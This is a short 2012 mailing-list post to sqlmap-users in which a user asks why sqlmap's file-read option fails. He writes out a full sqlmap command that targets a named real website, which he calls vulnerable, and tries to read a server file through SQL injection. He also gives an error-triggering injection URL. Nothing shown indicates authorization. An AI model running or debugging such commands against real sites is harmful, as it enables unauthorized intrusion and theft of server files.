[sqlmap-users] Help read file
Brought to you by:
inquisb
From: Jorge V. <jv...@co...> - 2012-07-30 02:53:35
|
Hi, great tool. I could never read or write a file on the server, I don't know why. For example this vulnerable web: python sqlmap.py -u "http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL" --file-read "/www/redpat.tv/htdocs/php/multimedia/p3.php" -v 5 It return the error: /www/redpat.tv/htdocs/php/multimedia/p3.php file saved to: 'None' If you go to: http://www.redpat.tv/php/multimedia/p3.php?codigo=REEL' you can see selecting to see the text, that the path on the server is right, thanks to the error message. Hope you can help me, thanks. Jorge Vespa COTASnet 3862818 Santa Cruz - Bolivia |